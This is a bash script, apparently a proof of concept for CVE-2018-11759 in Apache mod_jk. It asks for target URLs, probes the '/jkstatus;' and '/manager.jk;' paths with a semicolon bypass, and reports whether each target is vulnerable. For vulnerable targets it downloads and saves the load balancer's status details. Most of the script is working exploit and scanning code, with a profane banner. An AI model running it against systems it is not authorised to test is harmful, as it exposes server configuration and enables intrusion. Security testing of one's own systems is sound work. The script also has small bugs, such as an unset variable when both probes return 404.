#!/bin/bash
#	     CVE 2018-11759
# Author: Julio Lira <jul10l1r4@ufrn.edu.br>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html

# Fucking banner
printf "\033[32m"
cat << "EOF"
 ____  _____ ______   ___  _  ___        _ _ _____ ____  _____   
 / ___||  ___/ |___ \ / _ \/ |( _ )      / / |___  | ___|/ _ \ \  
 \___ \| |_ | |  __) | | | | |/ _ \ _____| | |  / /|___ | (_) | | 
  ___) |  _< <  / __/| |_| | | (_) |_____| | | / /  ___) \__, |  > >
  |____/|_|  | ||_____|\___/|_|\___/      |_|_|/_/  |____/  /_/| | 
              \_\                                             /_/  
	      By Segment Fault.
EOF


# Function for save all details of load balancer
_save(){
	# Verify if exists curl in machine
	which curl > /dev/null && \
		# ok or f'ck
		printf '\n Dependencia, curl encontrada...\n' \
		|| printf '\n \033[31mInstale o Curl\033[0m\n';
	# Make a download of details and redirect for directory
	# files_cap/
	echo -e '\033[32m Iniciando download de detalhes do balanceador\033[0m'
	cat <<- EOF > files_cap/$(printf "$1" | cut -d "/" -f 3).data
		$(curl "$1/jkstatus;?mime=prop")
	EOF
	> /dev/null
	# show msg of OK
	printf "\n \033[32mDetalhes salvos em files_cap/$(printf "$1" | cut -d "/" -f 3).data\033[0m\n"
}
# Function for send request
_req(){
	# Get status response of http and verify
	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus%3B" &3>/dev/null)
	echo "Resposta: $jks no /jkstatus"
	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk%3B" &3>/dev/null)
	echo "Resposta: $mjk no /manager.jk"
	if [ $mjk != 404 ];then
		url="$1/manager.jk;"
		response=$mjk
	elif [ $jks != 404 ];then
		url="$1/jkstatus;"
		response=$jks
	fi
}

# Help function
if [ "$1" == "--help" ]
then
	echo -e """
	\033[32mApenas abra e use\033[0m"""
fi

# This all is in portugues of brazil, learning or translate for u :)
while read -p "Cole a URL -> " LINE; do
	_req "$LINE"
	if [ $response = 200 ];then
		printf "\n \033[31mVulneravel\033[0m\n Veja: $url\n"
		_save "$url"
	elif [ $response = 302 ] || [ $response = 401 ];then
		printf "\n Seguro, mas pode sofrer ataque\n brute-force, cuidado\n Veja: $url\n"
	else
		printf "\n \033[032mSeguro, parabens\033[0m\n"
	fi
done


